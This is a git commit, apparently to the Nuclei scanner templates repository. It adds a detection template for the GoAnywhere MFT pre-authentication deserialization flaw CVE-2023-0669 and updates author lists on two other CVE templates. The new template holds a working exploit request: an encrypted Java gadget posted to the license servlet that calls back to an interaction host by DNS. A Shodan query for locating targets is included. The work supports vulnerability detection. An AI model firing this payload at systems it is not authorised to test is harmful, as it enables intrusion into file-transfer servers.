Added CVE-2023-0669 - GoAnywhere MFT - Remote Code Execution (ZeroDay) (#6701)

* Create CVE-2023-0669.yaml Co-Authored-By: Dhiyaneshwaran <24750220+DhiyaneshGeek@users.noreply.github.com> Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com> * misc update --------- Co-authored-by: Dhiyaneshwaran <24750220+DhiyaneshGeek@users.noreply.github.com> Co-authored-by: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com>
2023-02-10 20:20:32 +05:30 · 2023-02-10 20:20:32 +05:30 · 128449c8ac
parent 8a02161996
commit 128449c8ac
3 changed files with 45 additions and 2 deletions
--- a/cves/2022/CVE-2022-21587.yaml
+++ b/cves/2022/CVE-2022-21587.yaml
@ -2,7 +2,7 @@ id: CVE-2022-21587

 info:
  name: Oracle EBS Unauthenticated - Remote Code Execution
-  author: rootxharsh,iamnoooob
+  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.
--- a/cves/2022/CVE-2022-47966.yaml
+++ b/cves/2022/CVE-2022-47966.yaml
@ -2,7 +2,7 @@ id: CVE-2022-47966

 info:
  name: ManageEngine - Remote Command Execution
-  author: rootxharsh,iamnoooob,DhiyaneshDK
+  author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch
  severity: critical
  description: |
    Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.
--- a/cves/2023/CVE-2023-0669.yaml
+++ b/cves/2023/CVE-2023-0669.yaml
@ -0,0 +1,43 @@
+id: CVE-2023-0669
+
+info:
+  name: GoAnywhere MFT - Remote Code Execution (ZeroDay)
+  author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch
+  severity: critical
+  description: |
+    Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.
+  reference:
+    - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html
+    - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1
+    - https://infosec.exchange/@briankrebs/109795710941843934
+    - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/
+  metadata:
+    shodan-query: http.favicon.hash:1484947000
+    verified: true
+  tags: cve,cve2023,rce,goanywhere,oast
+
+requests:
+  - raw:
+      - |
+        POST /goanywhere/lic/accept HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+
+        bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - 'GoAnywhere'
+
+      - type: status
+        status:
+          - 500